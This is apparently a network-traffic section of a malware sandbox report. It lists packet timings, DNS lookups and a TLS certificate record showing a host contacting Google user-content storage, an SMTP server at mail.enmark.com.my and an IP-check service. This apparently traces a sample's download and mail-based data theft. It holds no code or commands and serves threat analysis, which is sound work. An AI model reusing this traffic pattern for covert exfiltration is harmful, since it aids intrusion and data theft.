Nov 19, 2020 08:27:18.371618986 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371628046 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371639013 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371651888 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371665001 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371675968 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371691942 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371704102 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371706963 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371731043 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371732950 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371751070 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371757984 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371778965 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371794939 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371803999 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371822119 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371844053 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371845007 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371866941 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371881008 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371892929 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371895075 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371915102 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371921062 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371942997 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371943951 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371962070 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371972084 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.371994019 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.371998072 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.372020960 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.372025013 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.372051001 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.372075081 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373055935 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373080969 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373104095 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373127937 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373136044 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373157024 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373162031 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373172998 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373193979 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373234987 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373251915 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373286009 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373286963 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373310089 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373342037 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373354912 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373408079 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373430967 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373462915 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373467922 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373485088 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373509884 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373522043 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373538017 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373562098 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373563051 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.373585939 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.373610973 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374200106 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374223948 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374243021 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374268055 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374284983 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374290943 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374315977 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374320030 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374339104 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374350071 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374361992 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374380112 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374388933 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374419928 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374454975 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374752045 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374813080 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374820948 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374845028 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374874115 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374891043 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.374943972 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374985933 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.374999046 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.375032902 CET	443	49728	216.58.215.225	192.168.2.5
Nov 19, 2020 08:27:18.375040054 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:18.375078917 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:37.739073038 CET	49728	443	192.168.2.5	216.58.215.225
Nov 19, 2020 08:27:55.694237947 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:55.864777088 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:55.864895105 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:56.979237080 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:56.979701996 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.151947975 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.152362108 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.324135065 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.367039919 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.374639988 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.582891941 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.638149977 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.638175964 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.638189077 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.638202906 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.638262033 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.638319016 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.640841961 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.694884062 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.698828936 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.866786957 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.867950916 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:57.913649082 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:57.952147961 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.125639915 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:58.126744986 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.295459032 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:58.296264887 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.484496117 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:58.485362053 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.653979063 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:58.654627085 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.824116945 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:58.824768066 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.992830992 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:58.994489908 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.994668007 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.994775057 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:58.994885921 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:27:59.163126945 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:59.163153887 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:59.163167000 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:59.455262899 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:27:59.507524014 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:56.322504997 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:56.399353027 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:56.490942955 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:56.491084099 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:56.492142916 CET	587	49736	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:56.492219925 CET	49736	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:56.567527056 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:56.567609072 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:57.983675003 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:57.983850002 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.152666092 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.152821064 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.324903011 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.325716972 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.506222010 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.506258011 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.506277084 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.506285906 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.506330013 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.506356001 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.510034084 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.521589994 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.690057993 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.691564083 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:58.859867096 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:58.860285997 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.028978109 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.029391050 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.216918945 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.217475891 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.385868073 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.386190891 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.555143118 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.555485010 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.723438025 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.724258900 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724282026 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724360943 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724369049 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724636078 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724642992 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724647999 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724769115 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724776030 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724845886 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724853992 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724939108 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.724944115 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.725022078 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.725028992 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.728156090 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.892576933 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892596960 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892604113 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892611027 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892618895 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892636061 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892715931 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892765999 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.892805099 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.892821074 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.892852068 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892885923 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892896891 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892909050 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.892920017 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.893038988 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.893085957 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.893115044 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.893129110 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.893394947 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:28:59.896065950 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:28:59.896253109 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061093092 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061131954 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061151028 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061168909 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061192989 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061213970 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061230898 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061254978 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.061359882 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061436892 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061548948 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061556101 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061619997 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061625004 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061736107 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061742067 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061810017 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061816931 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061919928 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.061924934 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.064308882 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.066462994 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.066489935 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.229487896 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.229517937 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.229528904 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.229654074 CET	49740	587	192.168.2.5	110.4.45.145
Nov 19, 2020 08:29:00.229676008 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.229999065 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.230268002 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.230587006 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.230789900 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.230873108 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.230909109 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.230990887 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.231067896 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.231106043 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.234285116 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.234311104 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.234476089 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.234549046 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.398428917 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.398453951 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.398466110 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.454734087 CET	587	49740	110.4.45.145	192.168.2.5
Nov 19, 2020 08:29:00.497458935 CET	49740	587	192.168.2.5	110.4.45.145

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 08:26:54.237250090 CET	65296	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:26:54.249738932 CET	53	65296	8.8.8.8	192.168.2.5
Nov 19, 2020 08:26:55.401566982 CET	63183	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:26:55.415371895 CET	53	63183	8.8.8.8	192.168.2.5
Nov 19, 2020 08:26:56.559595108 CET	60151	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:26:56.572633982 CET	53	60151	8.8.8.8	192.168.2.5
Nov 19, 2020 08:26:57.809521914 CET	56969	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:26:57.822350979 CET	53	56969	8.8.8.8	192.168.2.5
Nov 19, 2020 08:26:58.640713930 CET	55161	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:26:58.653855085 CET	53	55161	8.8.8.8	192.168.2.5
Nov 19, 2020 08:26:59.458678961 CET	54757	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:26:59.471820116 CET	53	54757	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:00.951829910 CET	49992	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:00.964931011 CET	53	49992	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:08.250885963 CET	60075	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:08.269663095 CET	53	60075	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:11.816901922 CET	55016	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:11.832067013 CET	53	55016	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:17.082673073 CET	64345	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:17.121517897 CET	53	64345	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:17.787735939 CET	57128	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:17.814774036 CET	53	57128	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:33.997560978 CET	54791	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:34.010755062 CET	53	54791	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:34.668859005 CET	50463	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:34.682001114 CET	53	50463	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:42.300301075 CET	50394	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:42.320557117 CET	53	50394	8.8.8.8	192.168.2.5
Nov 19, 2020 08:27:55.222601891 CET	58530	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:27:55.672352076 CET	53	58530	8.8.8.8	192.168.2.5
Nov 19, 2020 08:28:12.339971066 CET	53813	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:28:12.352359056 CET	53	53813	8.8.8.8	192.168.2.5
Nov 19, 2020 08:28:14.009948015 CET	63732	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:28:14.023250103 CET	53	63732	8.8.8.8	192.168.2.5
Nov 19, 2020 08:28:56.333825111 CET	57344	53	192.168.2.5	8.8.8.8
Nov 19, 2020 08:28:56.347043991 CET	53	57344	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 19, 2020 08:27:17.787735939 CET	192.168.2.5	8.8.8.8	0x3548	Standard query (0)	doc-0c-3k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Nov 19, 2020 08:27:55.222601891 CET	192.168.2.5	8.8.8.8	0x742	Standard query (0)	mail.enmark.com.my	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.333825111 CET	192.168.2.5	8.8.8.8	0x393c	Standard query (0)	checkip.amazonaws.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 19, 2020 08:27:17.814774036 CET	8.8.8.8	192.168.2.5	0x3548	No error (0)	doc-0c-3k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 08:27:17.814774036 CET	8.8.8.8	192.168.2.5	0x3548	No error (0)	googlehosted.l.googleusercontent.com		216.58.215.225	A (IP address)	IN (0x0001)
Nov 19, 2020 08:27:55.672352076 CET	8.8.8.8	192.168.2.5	0x742	No error (0)	mail.enmark.com.my	enmark.com.my		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 08:27:55.672352076 CET	8.8.8.8	192.168.2.5	0x742	No error (0)	enmark.com.my		110.4.45.145	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.amazonaws.com	checkip.check-ip.aws.a2z.com		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.check-ip.aws.a2z.com	checkip.us-east-1.prod.check-ip.aws.a2z.com		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		52.206.184.85	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		18.209.89.50	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		34.193.115.2	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		34.192.7.28	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		18.233.3.145	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		34.200.69.241	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		52.20.197.7	A (IP address)	IN (0x0001)
Nov 19, 2020 08:28:56.347043991 CET	8.8.8.8	192.168.2.5	0x393c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		3.222.126.94	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 19, 2020 08:27:17.859230042 CET	216.58.215.225	443	192.168.2.5	49728	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Nov 03 08:37:44 CET 2020 Thu Jun 15 02:00:42 CEST 2017	Tue Jan 26 08:37:44 CET 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
